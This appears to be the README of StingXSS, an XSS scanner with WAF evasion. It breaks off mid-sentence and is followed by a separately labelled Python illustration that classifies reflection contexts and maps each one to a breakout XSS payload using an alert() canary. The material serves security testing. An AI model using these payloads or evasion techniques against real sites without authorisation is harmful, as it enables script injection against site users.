CommonHuman-Lab/stingxss

GitHub: CommonHuman-Lab/stingxss

A context-aware XSS scanner that detects reflected, DOM-based and stored XSS, with WAF detection and evasion and headless-browser execution confirmation.

Stars: 5 | Forks: 0

# StingXSS

[![Python](https://img.shields.io/badge/Python-3.10%2B-blue.svg)](https://www.python.org/) [![PyPI](https://img.shields.io/pypi/v/stingxss.svg)](https://pypi.org/project/stingxss/) [![License](https://img.shields.io/badge/License-AGPLv3-green.svg)](LICENSE) [![Security](https://img.shields.io/badge/Security-XSS%20Scanner-red.svg)](https://github.com/CommonHuman-Lab/stingxss) [![WAF Evasion](https://img.shields.io/badge/WAF%20Evasion-10%20transforms-orange.svg)](https://github.com/CommonHuman-Lab/stingxss/wiki/CLI-flags) [![Browser](https://img.shields.io/badge/Browser-Chromium-blueviolet.svg)](https://github.com/CommonHuman-Lab/stingxss/wiki/Browser-engine)

**Context-aware XSS scanner** — reflected, DOM-based, stored and browser-confirmed XSS, with WAF detection and evasion. No Burp licence required. Finds only real vulnerabilities.

```
pip install stingxss
pip install "stingxss[browser]"   # + headless browser engine (quoted so zsh does not expand the brackets)

# from source
git clone https://github.com/CommonHuman-Lab/stingxss.git
cd stingxss
python -m stingxss
```

## Why StingXSS?

- **Context first** — targets `
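What "context-aware" means in practice, shown as an added illustration that is not StingXSS's own code: a probe reflected inside a JavaScript string needs a different breakout than the same probe reflected in an HTML attribute or a comment, so the scanner first classifies where each reflection landed and only then picks a payload. The sample response, the probe token, the canary value and the payload table below are all constructed for this example; the function names are the example's own.

```python
"""Reflection-context classification for an XSS probe.

Illustrative code only (not from the StingXSS project). Given a response
body and the probe token that was sent, it finds every reflection, works
out the syntactic context it landed in, and pairs it with a breakout
payload that closes that construct before executing.
"""
import re

CANARY = "7331"  # value a browser-side check would look for in alert()

# Hypothetical payload table: one breakout per context. A generic
# "<script>" payload is useless inside a JS string, and a '";' breakout
# is useless in HTML text, which is the whole point of classifying first.
PAYLOADS = {
    "html_text":            f"<svg onload=alert({CANARY})>",
    "html_comment":         f"--><svg onload=alert({CANARY})>",
    "tag_body":             f"><svg onload=alert({CANARY})>",
    "attr_double_quoted":   f'" autofocus onfocus=alert({CANARY}) x="',
    "attr_single_quoted":   f"' autofocus onfocus=alert({CANARY}) x='",
    "attr_unquoted":        f" autofocus onfocus=alert({CANARY}) x=",
    "script_double_quoted": f'";alert({CANARY});//',
    "script_single_quoted": f"';alert({CANARY});//",
    "script_template":      f"${{alert({CANARY})}}",
    "script_code":          f";alert({CANARY});//",
}

SCRIPT_OPEN = re.compile(r"<script\b[^>]*>", re.I)
SCRIPT_CLOSE = re.compile(r"</script\s*>", re.I)


def _quote_state(code: str, quotes: str, escapes: bool):
    """Quote character we are inside after consuming `code`, or None.
    JS honours backslash escapes inside strings; HTML attributes do not."""
    quote = None
    i = 0
    while i < len(code):
        c = code[i]
        if quote:
            if escapes and c == "\\":
                i += 1          # skip the escaped character
            elif c == quote:
                quote = None
        elif c in quotes:
            quote = c
        i += 1
    return quote


def _last_end(pattern: re.Pattern, text: str) -> int:
    end = -1
    for m in pattern.finditer(text):
        end = m.end()
    return end


def classify_context(html: str, pos: int) -> str:
    """Name the context of the character at `pos` in `html`."""
    before = html[:pos]
    # 1. Inside <script>...</script>: JS string rules apply, not HTML ones.
    if _last_end(SCRIPT_OPEN, before) > _last_end(SCRIPT_CLOSE, before):
        js = before[_last_end(SCRIPT_OPEN, before):]
        q = _quote_state(js, quotes="\"'`", escapes=True)
        return {'"': "script_double_quoted", "'": "script_single_quoted",
                "`": "script_template", None: "script_code"}[q]
    # 2. Inside an HTML comment.
    if before.rfind("<!--") > before.rfind("-->"):
        return "html_comment"
    # 3. Inside a tag: quoted attribute, unquoted attribute, or bare tag body.
    t_open, t_close = before.rfind("<"), before.rfind(">")
    if t_open > t_close:
        q = _quote_state(before[t_open:], quotes="\"'", escapes=False)
        if q == '"':
            return "attr_double_quoted"
        if q == "'":
            return "attr_single_quoted"
        token = re.split(r"\s", before[t_open:])[-1]   # text since last whitespace
        return "attr_unquoted" if "=" in token else "tag_body"
    return "html_text"


def scan(html: str, probe: str) -> list:
    """Every reflection of `probe` as (offset, context, matching payload)."""
    findings, start = [], 0
    while (pos := html.find(probe, start)) != -1:
        ctx = classify_context(html, pos)
        findings.append((pos, ctx, PAYLOADS[ctx]))
        start = pos + len(probe)
    return findings


# Constructed response: the probe "stqx9" sent as ?q= and reflected five times.
SAMPLE = """<html><head>
<script>var q = "stqx9"; track(q);</script>
</head><body>
<!-- debug: q=stqx9 -->
<input type="text" name="q" value="stqx9">
<a href=/search?q=stqx9>again</a>
<p>Results for stqx9</p>
</body></html>"""

if __name__ == "__main__":
    for offset, ctx, payload in scan(SAMPLE, "stqx9"):
        print(f"{offset:4d}  {ctx:22s}  {payload}")
```

The classifier is deliberately a heuristic: a real scanner also needs the `</script>` breakout (the HTML tokenizer ends a script element regardless of JS string state), URL and CSS contexts, and the response's encoding of the probe. Whether a chosen payload actually fires is then settled by loading the page in a headless browser and watching for the canary, which is the step that separates "reflected" from "exploitable" when output encoding or CSP intervenes.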